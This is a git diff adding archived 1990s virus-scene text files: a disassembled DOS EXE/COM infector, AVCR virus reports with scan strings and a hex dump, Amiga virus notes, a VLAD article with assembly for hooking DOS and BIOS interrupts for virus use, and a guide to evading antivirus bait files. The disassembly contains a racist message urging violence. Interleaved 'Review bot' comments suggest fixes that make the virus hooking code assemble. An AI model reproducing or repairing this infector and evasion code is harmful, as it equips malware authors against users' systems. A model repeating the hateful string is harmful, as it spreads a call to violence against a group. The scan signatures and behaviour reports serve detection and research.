8B00h + mov Byte Ptr [BX],AH + inc BX + cmp BX,3CBh + jle loc_1 ; Jump if not greater ( <= ) + retn +proc_2 endp + + + +var1_131 db '*.EXE' + db 0 +var1_137 db '*.COM' + db 0 +var1_13d db 2Eh, 2Eh, 0 +var1_140 db 0Dh, 0Ah + db 'Program too big to fit in memory$' +var1_163 db 0Dh, 0Ah, 9, 0C9h + db 66 dup (0CDh) + db 0BBh, 20h, 24h +var1_1ac db 0Dh, 0Ah, 9, 0BAh + db 20h, 20h, 57h +var1_1b3 db 'e Have Noticed That Wiggers Seem To Have' +loc_2: ; N-Ref=0 + and Byte Ptr [SI+61h],DL + +var1_1de db 'ken Over The High ' + db 0BAh, 20h, 24h +var1_1f5 db 0Dh, 0Ah, 9, 0BAh +var1_1f9 db ' School Scen' +var1_207 db 'e. If You See One, Please Hit Him With Your Car! 
' + db ' ' + db 0BAh, 20h, 24h +var1_23e db 0Dh, 0Ah +loc_3: ; N-Ref=0 + or AX,CX + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + int 0CDh + mov SP,2420h + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL + add Byte Ptr [BX+SI],AL +loc_5: ; N-Ref=4 + mov AH,2Ch ; ',' + int 21h ; DOS func ( ah ) = 2Ch + ; Get time + ;CL-min CH-hours DH-seconds + ; DL-1/100 of secs + cmp Byte Ptr var1_106,0 ; [6556:0106] = 8B00h + je loc_6 ; Jump if equal ( = ) + cmp DH,0Fh + jnle loc_7 ; Jump if greater ( > ) +loc_6: ; N-Ref=1 + cmp DL,0 + je loc_5 ; Jump if equal ( = ) + mov Byte Ptr var1_106,DL ; [6556:0106] = 8B00h +loc_7: ; N-Ref=1 + mov Byte Ptr var1_29b,0 ; [6556:029B] = 0 + mov Byte Ptr var1_29c,4 ; [6556:029C] = 0 + mov Byte Ptr var1_2a5,0 ; [6556:02A5] = 0B400h +loc_8: ; N-Ref=1 + mov CX,27h + mov DX,offset var1_131 + mov AH,4Eh ; 'N' + int 21h ; DOS func ( ah ) = 4Eh + ; FIND FIRST: Start file search + ;CX-attr to search on + ; DS:DX-ASCIIZ string + ;if CF=1 AX-ret code + cmp AX,12h + je loc_9 ; Jump if equal ( = ) + call near ptr proc_3 +loc_9: ; N-Ref=1 + mov CX,27h + mov DX,offset var1_137 + mov AH,4Eh ; 'N' + int 21h ; DOS func ( ah ) = 4Eh + ; FIND FIRST: Start file search + ;CX-attr to search on + ; DS:DX-ASCIIZ string + ;if CF=1 AX-ret code + cmp AX,12h + je loc_10 ; Jump if equal ( = ) + call near ptr proc_3 +loc_10: ; N-Ref=1 + mov DX,offset var1_13d + mov 
AH,3Bh ; ';' + int 21h ; DOS func ( ah ) = 3Bh + ; CHDIR: Change directory + ;DS:DX-ASCIIZ string + ;AX-ret code if CF set + dec Byte Ptr var1_29c ; [6556:029C] = 0 + jne loc_8 ; Jump if not equal ( != ) + jmp loc_15 + +; +; +; PROCEDURE proc_3 +; +; + +proc_3 proc near +loc_11: ; N-Ref=1 + mov BX,80h + mov AX,Word Ptr [BX+15h] + mov Word Ptr var1_2a1,AX ; [6556:02A1] = 0 + mov AX,Word Ptr [BX+16h] + mov Word Ptr var1_29d,AX ; [6556:029D] = 0 + mov AX,Word Ptr [BX+18h] + mov Word Ptr var1_29f,AX ; [6556:029F] = 0 + mov DX,9Eh + mov CX,0 + mov AL,1 + mov AH,43h ; 'C' + int 21h ; DOS func ( ah ) = 43h + ; CHMOD:Get/set file attributes + ;AL-(0/1)get/set code CX-attrib + ; DS:DX-ASCIIZ string + ;if CF=1 AX-ret code + ; CX-attrib if set used + mov AL,2 + mov AH,3Dh ; '=' + int 21h ; DOS func ( ah ) = 3Dh + ; Open file + ;CX-acsess code + ; DS:DX-ASCIIZ string + ;AX-file handle + ; if CF=1 AX-error code + mov Word Ptr var1_2a3,AX ; [6556:02A3] = 0 + mov BX,AX + mov CX,14h + mov DX,offset var1_287 + mov AH,3Fh ; '?' 
+ int 21h ; DOS func ( ah ) = 3Fh + ; Read from file or device + ;BX-file handle + ; CX-bytes to read DS:DX-DTA + ;if CF=0 AX-bytes read + ; else AX-ret code + mov BX,offset var1_287 + mov AH,Byte Ptr var1_106 ; [6556:0106] = 8B00h + mov Byte Ptr [BX+6],AH + mov SI,offset var1_100 + mov DI,offset var1_287 + mov AX,DS + mov ES,AX + cld ; Clear direction flag + repz cmpsb ; Repeat if ZF = 1, CX > 0 + ; Cmp byte at DS:SI to ES:DI + jne loc_14 ; Jump if not equal ( != ) + call near ptr proc_4 + inc Byte Ptr var1_29b ; [6556:029B] = 0 +loc_12: ; N-Ref=1 + mov AH,4Fh ; 'O' + int 21h ; DOS func ( ah ) = 4Fh + ; FIND NEXT: Continue file search + ;DS:DX-info from FIND FIRST + ; or prev FIND NEXT + ;if CF=1 AX-ret code + cmp AX,12h + je loc_13 ; Jump if equal ( = ) + jmp short loc_11 +loc_13: ; N-Ref=1 + retn +loc_14: ; N-Ref=1 + mov BX,Word Ptr var1_2a3 ; [6556:02A3] = 0 + mov AH,3Eh ; '>' + int 21h ; DOS func ( ah ) = 3Eh + ; Close file handle + ;BX-file handle + ;if CF=1 AX-ret code + mov AH,3Dh ; '=' + mov DX,9Eh + mov AL,2 + int 21h ; DOS func ( ah ) = 3Dh + ; Open file + ;CX-acsess code + ; DS:DX-ASCIIZ string + ;AX-file handle + ; if CF=1 AX-error code + mov Word Ptr var1_2a3,AX ; [6556:02A3] = 0 + call near ptr proc_1 + call near ptr proc_4 + inc Byte Ptr var1_2a5 ; [6556:02A5] = 0B400h + dec Byte Ptr var1_29c ; [6556:029C] = 0 + je loc_15 ; Jump if equal ( = ) + jmp short loc_12 +proc_3 endp + + + + db 0C3h + +; +; +; PROCEDURE proc_4 +; +; + +proc_4 proc near + mov BX,Word Ptr var1_2a3 ; [6556:02A3] = 0 + mov CX,Word Ptr var1_29d ; [6556:029D] = 0 + mov DX,Word Ptr var1_29f ; [6556:029F] = 0 + mov AL,1 + mov AH,57h ; 'W' + int 21h ; DOS func ( ah ) = 57h + ; Get/set file date and time + ;AL-(0/1)get/set flag BX-handle + ; CX/DX-time/date,if AL=1 + ;if CF=1 AX-extended err code + ; CX/DX-time/date if AL=0 + mov BX,Word Ptr var1_2a3 ; [6556:02A3] = 0 + mov AH,3Eh ; '>' + int 21h ; DOS func ( ah ) = 3Eh + ; Close file handle + ;BX-file handle + ;if CF=1 AX-ret code + 
mov CX,Word Ptr var1_2a1 ; [6556:02A1] = 0 + mov AL,1 + mov DX,9Eh + mov AH,43h ; 'C' + int 21h ; DOS func ( ah ) = 43h + ; CHMOD:Get/set file attributes + ;AL-(0/1)get/set code CX-attrib + ; DS:DX-ASCIIZ string + ;if CF=1 AX-ret code + ; CX-attrib if set used + retn +proc_4 endp + + +loc_15: ; N-Ref=2 + cmp Byte Ptr var1_29b,6 ; [6556:029B] = 0 + jl loc_16 ; Jump if less ( < ) + cmp Byte Ptr var1_2a5,0 ; [6556:02A5] = 0B400h + jnle loc_16 ; Jump if greater ( > ) + mov AH,9 + mov DX,offset var1_163 + int 21h ; DOS func ( ah ) = 9 + ; Display string + ;DS:DX-output string + mov DX,offset var1_1ac + int 21h ; DOS func ( ah ) = 9 + ; Display string + ;DS:DX-output string + mov DX,offset var1_1f5 + int 21h ; DOS func ( ah ) = 9 + ; Display string + ;DS:DX-output string + mov DX,offset var1_23e + int 21h ; DOS func ( ah ) = 9 + ; Display string + ;DS:DX-output string + jmp short loc_17 + + db 90h +loc_16: ; N-Ref=2 + mov AH,9 + mov DX,offset var1_140 + int 21h ; DOS func ( ah ) = 9 + ; Display string + ;DS:DX-output string +loc_17: ; N-Ref=1 + mov AH,4Ch ; 'L' + int 21h ; DOS func ( ah ) = 4Ch + ; Terminate process + ;AL-ret code + + dw 7 dup (9090h) + db 90h +CODE_SEG_1 ends + + + + end start +----------------------------------------------------------------------------- + This seems to be similar to the leprosy B code except for encryption +and strings displayed. + ST diff --git a/textfiles.com/virus/avcr-01.009 b/textfiles.com/virus/avcr-01.009 new file mode 100644 index 00000000..54a21d3d --- /dev/null +++ b/textfiles.com/virus/avcr-01.009 
@@ -0,0 +1,62 @@ + + + + + + + + + + + + + + + + + + + Distributed By Amateur Virus Creation & Research Group (AVCR) + + + +Name Of Virus: Connie +----------------------------------------------------------------------------- +Alias: Connie.A (From TBAV 6.26) +----------------------------------------------------------------------------- +Type Of Code: Encrypted with Debugger Trap, Uses Dark Slayer's Mutation Eng. +----------------------------------------------------------------------------- +VSUM Information: (NONE) +----------------------------------------------------------------------------- +Antivirus Detection: +(1) +ThunderByte Anti Virus (TBAV) reported files as infected with Connie.A + +(2) +Frisk Software's F-Protect (F-PROT) reported infected files as Nothing. + +(3) +McAfee Softwares Anti Virus (SCAN.EXE) reported infected files as nothing. + +(4) +MicroSoft Anti Virus (MSAV.EXE) reported infected files as nothing. +----------------------------------------------------------------------------- +Execution Results: +On it's first run, it hits Command.Com Immediately. It traces back to +find where the boot (command.com) was loaded, and then tries to infect +it. It does not change dates or times on infected files, but you will +notice an increase of 1761 bytes in each infected file. This virus will +only hit .COM files, and once executed, goes memory resident. + +----------------------------------------------------------------------------- +Cleaning Recommendations:TBAV's TBCLEAN can easily remove it +----------------------------------------------------------------------------- +Researcher's Notes: +Connie will hit all Com files that are executed or copied. It will hit +the original file, and also the copied file as it is moved. + +It hooks Int's 21, 30, ED, EE, F0, F5, F6, F9, and FD. + +Connie sits in memory at location 09F240 - 09FFFF... (High as it can go) + + -The W$l- 
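Review bot: field formatting in the Connie entry drifts from the template used by the rest of the file: `Cleaning Recommendations:TBAV's` lacks the space after the colon that the other fields have, and "On it's first run" should read "its". Neither matters if the series is being committed verbatim, but then the commit message should say so; if the text is being normalised, these are the two lines to touch. The interrupt list in the notes (21, 30, ED, EE, F0, F5, F6, F9, FD) and the memory range 09F240-09FFFF are the only technical facts in the entry and should be kept exactly as written.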
diff --git a/textfiles.com/virus/avcr-01.010 b/textfiles.com/virus/avcr-01.010 new file mode 100644 index 00000000..871a09de --- /dev/null +++ b/textfiles.com/virus/avcr-01.010 
@@ -0,0 +1,74 @@ + + + + + + + + + + + + + + + + + + + Distributed By Amateur Virus Creation & Research Group (AVCR) + + + +Name Of Virus: OOHLALA2 +----------------------------------------------------------------------------- +Alias: None +----------------------------------------------------------------------------- +Type Of Code: Encrypte EXE & COM infector, Non-Mem-resident +----------------------------------------------------------------------------- +VSUM Information - (NONE) +----------------------------------------------------------------------------- +Antivirus Detection: +(1) +ThunderByte Anti Virus (TBAV) reported infected files as "Possible Virus" + +(2) +Frisk Software's F-Protect (F-PROT) reported infected files as Nothing. + +(3) +McAfee Softwares Anti Virus (SCAN.EXE) reported infected files as nothing. + +(4) +MicroSoft Anti Virus (MSAV.EXE) reported infected files as nothing. +----------------------------------------------------------------------------- +Execution Results: +Upon execution, it displays the following- + "Ohhhh La La! + Mommmy, Theyre Teasing me again + Shut up you little sonsuvbitches" + Then plays a nice little tune. +Before the tune starts, it nails 6 files total, COM & EXE... Either one. + +----------------------------------------------------------------------------- +Cleaning Recommendations:Delete Infected or TBAV (using Anti-Vir.dat..) +----------------------------------------------------------------------------- +My Notes: +This virus is a non-resident infector of EXE & COM files, except Command.com. +It will not (that I found) infect files under 1K in size of either ext. +EXE's show up as 1960 larger than before, but COM files didn't until I +rebooted the PC... (?) Maybe My PC glitched... I Dunno... 
+ +----------------------------------------------------------------------------- + Disassembly of the OOHLALA2 Virus +----------------------------------------------------------------------------- +I found all EXE files to contain this string... +"BF 10 01 06 1E 06 89 FE 81 EE 00 01 32 E4" + +All COM files had.... +"BF ?8 ?? 06 1E 06 89 FE 81 EE 00 01 32 E4" + +So, just add this to your scanner... No problemo.... +"06 1E 06 89 FE 81 EE 00 01 32 E4" +----------------------------------------------------------------------------- + + 'Till next time, I'm The W$l, and you're not....... diff --git a/textfiles.com/virus/avcr-01.011 b/textfiles.com/virus/avcr-01.011 new file mode 100644 index 00000000..2c44a822 --- /dev/null +++ b/textfiles.com/virus/avcr-01.011 
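Review bot: the section headed `Disassembly of the OOHLALA2 Virus` contains no disassembly, only three scan strings, so the heading is misleading; either rename it or add a sentence saying only signatures were extracted. On the signatures themselves, the 11-byte common string the author proposes (`06 1E 06 89 FE 81 EE 00 01 32 E4`) decodes to push es / push ds / push es / mov si,di / sub si,0100h / xor ah,ah, a short entry prologue that is not specific to this sample, so dropping it into a scanner as-is invites false positives; the longer EXE string with the leading `BF 10 01` (mov di,0110h) is the more specific of the two and a note to that effect would help anyone who takes the "just add this to your scanner" advice literally. Minor: "Encrypte" in the Type Of Code field is a typo and the field is labelled `My Notes:` here where the other entries use `Researcher's Notes:`.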
@@ -0,0 +1,90 @@ + + + + + + + + + + + + + + + + + + + Distributed By Amateur Virus Creation & Research Group (AVCR) + + + +Name Of Virus: TWISTER VIRUS +----------------------------------------------------------------------------- +Alias: Twistone +----------------------------------------------------------------------------- +Type Of Code: Unknown +----------------------------------------------------------------------------- +VSUM Information - (NONE) +----------------------------------------------------------------------------- +Antivirus Detection: +(1) +ThunderByte Anti Virus (TBAV) reported twister.com as "Possible Virus" + +(2) +Frisk Software's F-Protect (F-PROT) reported twister.com as "Seems to be +infected with unknown" + +(3) +McAfee Softwares Anti Virus (SCAN.EXE) reported twister.com as clean. + +(4) +MicroSoft Anti Virus (MSAV.EXE) reported twister.com as clean. +----------------------------------------------------------------------------- +Execution Results: +It nails 1 Com file every time it's executed, (or the infected file is +executed), It loads into the systems Master Boot Record (In Sector 195 +as near as I can tell). +It hooks Int. 2 (NMI) - 8 (Timer) - 9 (Keyboard) - 0E (Diskette) - +22 (Dos Terminate) - 23 (Dos Ctrl-C) - 24 (Fatal Error Handler) - 2E +(File Execute) - 2F (Program Multiplex) +I Can't find a specific address it's loading at yet.. I'm still working + +----------------------------------------------------------------------------- +Cleaning Recommendations:Delete Infected or TBAV (using Anti-Vir.dat..) +----------------------------------------------------------------------------- +Researcher's Notes: +Here's the Scan string to add to your AV software for Twister... +8B F6 90 90 B8 01 FA BA 45 59 CD 16 E8 00 + +----------------------------------------------------------------------------- + Disassembly of the 'Twister' Orig. 
Virus, (Raw format) +----------------------------------------------------------------------------- + +000000: 8B F6 90 90 B8 01 FA BA 45 59 CD 16 E8 00 00 5D ........EY..... +000010: 81 ED 0F 01 8D 9E 22 02 FF 37 43 43 FF 37 B4 1A ......"..7CC.7. +000020: 8D 96 26 02 CD 21 CC B4 4E 8D 96 1A 02 CD 21 72 ..&..!..N.....! +000030: 03 EB 04 90 E9 C3 00 B4 2F CD 21 33 C0 8D 77 1E ......../.!3..w +000040: AC 0A C0 75 FB 83 EE 04 AC 3C 43 74 03 E9 A5 00 ...u......!.O./...... +000100: 21 BB 02 01 8F 07 4B 4B 8F 07 53 33 C0 33 DB 33 !.....KK..S3.3. +000110: C9 33 D2 33 ED 33 F6 33 FF C3 2A 2E 2A 00 E9 00 .3.3.3.3..*.*.. +000120: 00 90 CD 20 00 00 00 00 00 00 00 00 54 68 61 6E ... ........Tha +000130: 6B 73 20 74 6F 20 56 69 70 65 72 2C 20 4D 65 6D ks to Viper, Me +000140: 6F 72 79 20 4C 61 70 73 65 00 00 00 00 00 00 00 ory Lapse...... + +It uses through E9 (on line 000110) when it infects. + + L8r, dudez... + -The W$l diff --git a/textfiles.com/virus/avcr-01.012 b/textfiles.com/virus/avcr-01.012 new file mode 100644 index 00000000..59f3eefd --- /dev/null +++ b/textfiles.com/virus/avcr-01.012 
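Review bot: the raw dump in the Twister file is damaged: offsets jump from 000040 straight to 000100, and the ASCII column on the 000040 line (`...u......!.O./......`) is longer than the 16 bytes it should represent, so the rows for 000050 through 0000F0 were lost and part of their ASCII tail was fused onto 000040. Mark the dump as truncated in the file or restore it from the upstream copy; as committed, the sentence "It uses through E9 (on line 000110)" points into a listing a reader can no longer follow. Also note that the scan string in Researcher's Notes and the first dump row are the same 14 bytes (`8B F6 90 90 B8 01 FA BA 45 59 CD 16 E8 00`), which is worth stating so a reader knows the signature is simply the entry point.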
@@ -0,0 +1,63 @@ + + + + + + + + + + + + + + + + + + + Distributed By Amateur Virus Creation & Research Group (AVCR) + + +Name Of Virus: VLAMIX 1.0 +----------------------------------------------------------------------------- +Alias: +----------------------------------------------------------------------------- +Type Of Code: Encrypted with Debugger Trap +----------------------------------------------------------------------------- +VSUM Information - (NONE) +----------------------------------------------------------------------------- +Antivirus Detection: +(1) +ThunderByte Anti Virus (TBAV) reported Vlamix.EXE as "Possible Virus" + +(2) +Frisk Software's F-Protect (F-PROT) reported Vlamix.exe as Nothing. + +(3) +McAfee Softwares Anti Virus (SCAN.EXE) reported Vlamix.exe as nothing. + +(4) +MicroSoft Anti Virus (MSAV.EXE) reported Vlamix.exe as nothing. +----------------------------------------------------------------------------- +Execution Results: +On it's first run, it hits 4 exe files in the current directory, and +disables them. Thunderbyte will run after it's hit, but it won't show +or tell you that it has been modified and/or infected. Upon the usual +sanity check it does, the system locks up. It is memory resident and +uses an undocumented dos interrupt to check for itself in memory. +----------------------------------------------------------------------------- +Cleaning Recommendations:Delete Infected or TBAV (using Anti-Vir.dat..) +----------------------------------------------------------------------------- +Researcher's Notes: +Here's the Scan string to add to your scanner to catch this one.... +06 1E 8C C8 8E D8 BF 28 00 A1 50 04 31 05 + +----------------------------------------------------------------------------- + Disassembly of the VLAMIX Virus +----------------------------------------------------------------------------- + +Thunderbyte 6.26 can't properly ID or name this one, so just add +it to your scanner. + + -The Weaz 
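Review bot: the heading `Disassembly of the VLAMIX Virus` in this entry is followed by no disassembly at all, only the remark that Thunderbyte 6.26 cannot name the sample, so the heading should either go or be followed by a sentence saying the disassembly was not done. The scan string (`06 1E 8C C8 8E D8 BF 28 00 A1 50 04 31 05`) and the byte counts in Execution Results are the entry's only technical content and should be kept verbatim; "On it's first run" should read "its" if the text is being edited rather than archived as received.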
diff --git a/textfiles.com/virus/avirus.txt b/textfiles.com/virus/avirus.txt new file mode 100644 index 00000000..3dc39213 --- /dev/null +++ b/textfiles.com/virus/avirus.txt 
@@ -0,0 +1,76 @@ + +THE SCA VIRUS: --------------------- The original. The one that +started all this craziness. It hids in memory, attaching itself to +ANY disk you boot off of.Prints the infamous "Something wonderful has +happened...",etc., etc. Install all disks that have it and then +reboot from a cold start or from a warm start HOLDING down the LEFT +miuse button.This puts it to death. + +BYTE BANDIT VIRUS: --------------------- What the Byte Bandit virus +does is once it's in memory, it copies itself to just above the high +memory pointer on the first hunk of RAM it can find (Which means it's +not always in the same place), wedges itself into the Interrupt Server +chain, into the Trackdisk.device's vectors,and creates itself a +Resident structure so it can hang around after reboot. It watches +EVERY disk inserted, and will write itself to ANY bootable disk that +is inserted! This one can spread like wildfire - every disk you +insert into your external drive during a session with this Virus +loaded will result in all those disks being infected. Ouch. Also, if +you Install a disk while this virus is going, it will just copy itself +back to the disk - which is why it has to be wiped from memory to be +destroyed. + +The REVENGE VIRUS: ---------------------- This virus is not yet +common in North America (I think Steve Tibbett is the first person +here to have a copy of it), but it is apparently making the rounds in +Sweden and Germany.What this virus does, is everything that the Byte +Bandit virus does,PLUS, after infecting a disk, it will wait one +minute after every reboot, and change your mouse pointer into an image +of a certain part of the Male anatomy. 8-) I think the reason this +virus is called the "Revenge" virus is because it looks specifically +for the Byte Bandit and for the SCA Virus. If it finds either of +these, it Rigs THAT virus so that it will CRASH the machine unless +THIS virus is loaded first. 
Note that I might be wrong about this - +that's the way it looks from the disassembly,- but be warned,in case +it pops up later or something. He stays in RAM via changing the +CoolCapture vector to point to his own code. He then intercepts the +DoIO() call and watches for any attempts to rewrite or to read the +boot block and acts accordingly.He also has an interrupt around +counting VBlanks until it's time to bring up his sicko pointer. To +get this virus out of memory is Simple - Hold down the Joystick button +(Plug a joystick into port 2, and hold down the button while you are +rebooting), and the screen will briefly turn RED during the boot, and +it's out of memory. (If you hold down Joystick button AND mouse +button, it will half-remove himself from RAM and turn the screen +Blue). + +THE BYTE WARRIOR VIRUS: ------------------------- The Byte Warrior +Virus is a lot like the Byte Bandit virus, except it is not designed +to hurt anything - it will start an "Alarm" sound if it sees another +virus (or at least I think it does - it hasn't for me), but other than +that, it will write itself to any disk inserted. There is also a +hidden message in it, asking us to spread it around and not to erase +it. Ya, right. + +THE NORTH STAR AntiVIRUS: -------------------------- This virus +alerts you to the presence of other viruses.I think this sort of idea +is stupid because it can do just as much damage as the rest of them. + +THE OBELISK SOFTWARE CREW VIRUS: THE PENTAGON CIRCLE VIRUS: THE +SYSTEMZ VIRUS: ---------------------------------- More of the same. + +THE IRQ VIRUS: ------------------------- The FIRST non boot-block +virus! This one is murder! Since it does not attach itself to the +boot block it is not a simple think to find. This baby attacks the +FIRST executable file in your startup-sequence or,if it can't get at +that file, it will attack the DIR command in your C directory! 
Get +and read the fine writeup of this virus by S.Tibbett included with his +VIRUSX utility. + +Anyway....the saga continues...... +I highly recommend that you get a copy of Steve Tibbett's excellent +utility, VIRUSX (the current version as of 9/16/89 is VIRUSX3.20 ). +This fine utility detects all 16 known viruses and kills them on the +disk and in RAM. The built-in sector-viewer allows you to see the +virus on the disk and to also observe any unusual boot block code. + diff --git a/textfiles.com/virus/backdoor.txt b/textfiles.com/virus/backdoor.txt new file mode 100644 index 00000000..fdff9017 --- /dev/null +++ b/textfiles.com/virus/backdoor.txt 
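Review bot: the section separators in avirus.txt (`THE SCA VIRUS: ---------------------`, `BYTE BANDIT VIRUS: ---------------------` and so on) have been wrapped into the body text, so each description starts mid-line instead of under its own heading; putting each heading and its dashed underline back on their own lines would restore the structure the author clearly intended. Typos in the archived prose ("hids", "miuse", "not a simple think to find") are the original author's and should stay if this is a verbatim copy. The closing paragraph's date for the VIRUSX version (9/16/89, VIRUSX3.20) is the one provenance line in the file and must survive any cleanup.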
@@ -0,0 +1,162 @@ + + + Backdoors! + +--------+ Qark/VLAD + + + The information in this article concerns the backdoors in MS-DOS and + BIOS that can be used and abused by a virus for it's own ends! Most + of them concern the Int21h DOS services interrupt and Int13h Disk + services. + + Int40h - The floppy disk handler gets relocated to Int40h by the Hard + disk BIOS and is called by Int 13h. Int40h can be hooked and + used to infect floppy disks. Be cautious when using this + because if no harddisk is present it isn't set. + + Int30h - This is not infact an interrupt at all. It is a far jump + to the original interrupt 21h handler that is stored at + the address of int30h. It was originally used for the CP/M + emulation in earlier versions of DOS and remains there today. + If you look at the PSP information, at PSP:[5] is a 'call + to the DOS function dispatcher'. It actually calls the int30h + we are talking about (but due to a microsoft stuff up it misses + by two bytes). There are two ways of using this backdoor, the + first way could be for a really hard method for infection or a + good destructive payload. You can use it directly by calling + it in an unusual fashion. This function could be messed up by + some programs but I have yet to see it not work anywhere. + Thanx go out to John Switzer for supplying me for this + information although I'm sure he wouldn't appreciate it's + use! :) + + Method One: + You can only use DOS functions AH=0 to 24h with this and + any functions that require AL can't be used. + + Int21h Proc Near + ;Call this from your code with the same parameters + ; as the real DOS int 21h function. + ;Truly weird I'm sure you'll agree! + + mov cl,ah ;It uses CL. + mov ax,offset return_addr ;Stack is backwards + push ax + push cs + pushf ;Flags are last!! + + db 0eah ;JMP FAR PTR + dw 0c0h ;30h * 4 + dw 0 ;Interrupt table. + return_addr: + ret ;Back to user. 
+ Int21h EndP + + Method Two: + This is different in that it uses the segment:offset + address of the Int30h to get the original 'proper' Int21h + that we are all used to. This method is used by the + writers of the MG virus (who also wrote creeping death, + very talented and good researchers!) Anyway you can work + that out yourself, thats why it's called research! + + Int2fh - When DOS gets loaded it hooks int13h and saves the original + ah=13h addresses for its own use. When this function is called it + returns two addresses where one is slightly closer to the + original int13h than the other, but I'm not too sure which is + the closer of the two (they are often equal). If you play + with this yourself look it up in Ralf Brown's, you can probably + point the DOS calls to your virus if you do it right. + + To grab the original int13h without messing up DOS: + + mov ah,13h + int 2fh ;Get the int13h's + + push es ;Save them + push ds + push dx + push bx + + int 2fh ;Put them back to what they were. + + pop bx ;Now we've got our handlers. + pop dx + pop ds + pop es + + ;From here you can either choose to use ES:BX or DS:DX + ;as your int13h. + + Seg70h - Segment 70h is used by DOS. All DOS disk access passes through + it at sometime. All you have to do is scan through it for + the bytes of the different calls. This method was first + used by the Creeping Death virus and is used in the 1984 + (listed as 'ignorant' by CARO) and Daemon viruses. I'd + suggest running through this with a debugger and having a + look to work out what's going on. DOS has been using 70:B4 + to store the original Int 13h since DOS 3.3. + + mov ax,70h + mov ds,ax + mov si,2 + first_backdoor: + or si,si + jz wherever + + dec si ;SI-1 + lodsw ;DS:[SI] to AX SI+2 + + cmp ax,1effh ;FF1E = CALL FAR PTR [xxxx] + jnz first_backdoor + + cmp word ptr [si],0b4h ;This is just there :) + jnz first_backdoor + + jmp set_fake_int13 ;We've found it! 
+ + set_fake_int13h: + mov si,[si] ;SI=Where the address is + ;stored. + ;save the int13h into the virus + mov cs:orig_store,word ptr [si] + mov cs:orig_store+2,word ptr [si+2] + ;point it to our virus + mov word ptr [si],offset our_int13 + mov word ptr [si+2],cs + + ;ret or whatever... + + Int2fh - Have a look at this interrupt in Ralf Browns (a must for every + virus programmer) it can do ALL the interrupt 21h functions! + The only problem is working out the DOS stacks and so + on. It is handy for bypassing AV monitors, but it is much + too huge to go into in any detail. + + BIOS - Within BIOS lurk a number of stationary entry points to + entry interrupts. There are a few problems with these, as alot + points of BIOSes are incompatible and QEMM won't work with them + but they can be useful because there isn't ANYTHING that + can be done to stop it. + + Here are a list of addresses that are guaranteed not to + work half the time but have a look anyway. + + F000:EC59 Floppy disk int 13h + F000:F859 Int 15h, sometimes useful + + Int2ah - This is called by Int 21h on every file related function. By + ah=82h modifying the stack or certain registers you can change the + function that was called to whatever you want. DOS stores + the function multiplied by two in BL (eg Int 21h AH=40h will + be BL=80h when the int 2ah is called.). If you change this + BL to another function it should fool most AV monitors. This + may only work for some versions of DOS. + + Int21h - If you call this service you can do any DOS function. Have a + ax=5d00h look! All you have to do is set your registers up in a table. + It should be easy to write a basic simulated int21h using + this. + + Anymore ? Not that I can think of! If you know any... tell me!! + diff --git a/textfiles.com/virus/baitdet.txt b/textfiles.com/virus/baitdet.txt new file mode 100644 index 00000000..c2b57534 --- /dev/null +++ b/textfiles.com/virus/baitdet.txt 
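Review bot: the Seg70h scanner jumps to a label that is never defined: the scan ends with `jmp set_fake_int13` but the handler is declared as `set_fake_int13h:`, so the listing does not assemble as given; rename one of the two. Two smaller points in the same listing: `jz wherever` is a placeholder that needs a real exit label, and the loop only terminates when SI wraps to zero, so on a DOS where 70:B4 is not the stored vector (the text itself limits the claim to 'since DOS 3.3') it walks the whole 64K of segment 70h before giving up. In Method One the frame is pushed as return offset, then CS, then flags, which is the reverse of the order an INT builds; the only explanation offered is the comment 'Stack is backwards', and a sentence on what the CP/M-style entry behind the far jump at 0:C0 actually expects would make the method verifiable rather than something the reader has to trust. From the defensive side, the common thread of the hunk is that every entry point it lists (the jump at 0:C0, the pointer at 70:B4, the AH=13h/INT 2Fh pair) is a vector a resident monitor can record at boot and re-check later, which is the natural counter to the text's claim that 'there isn't ANYTHING that can be done to stop it'.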
@@ -0,0 +1,174 @@ + + + Advanced bait detection + + by CoKe/VLAD + + + + Introduction: + + + Bait files are the files the AV create to get them infected by a virus, + to check out his behaviour, his polymorphism, and last but not least to + debug it. Usually these files are pretty small, and only contain a few + instructions (i.e. Printing a message). As soon as they start infecting + hundreds (maybe thousands) of baits, they'll find out everything about + the virus. So to give them a real hard time doing their jobs, every + virus should in one way or another be able to recognize those files. + + There are many possible ways of detecting bait files; most of them are + covered by the article 'Resist!' which you can find in this issue as well. + Since I suppose you don't want to read all that stuff twice, I will just + leave it out of my article. + + In this article I will cover another way of detecting bait files: + code-analysis, bait-heuristics to say so, and after checking out tons + of executables, here's what I found out: + + + + + + 1 - COM Baits + + + Detecting COM baitfiles is a bit difficult, since you really have to + check out the code (in EXE's you can analyse the header aswell, but + the informations below are still true for them). Since bait files are + usually pretty small, best way to do it is to check the first 2048 + (or even 4096) bytes for some specific constructions. Below are + listed a few things that mostly happen in bait files. Of course it's + no 100% detection, but if some of these criteria are fulfilled together, + it's better to make your virus ignore that file. + + + - Check for massive use of INC/DEC structures (there's no point in + increasing a register right after decreasing it :)) + + i.e. : INC AX + DEC AX + INC BX + DEC BX + etc. + + + - Check for a huge amount of NOP's (especially after jumps), since in + "normal" COM files, there are few or no NOP's at all. + + i.e. : JMP 110 + NOP + NOP + NOP + NOP + NOP + etc. 
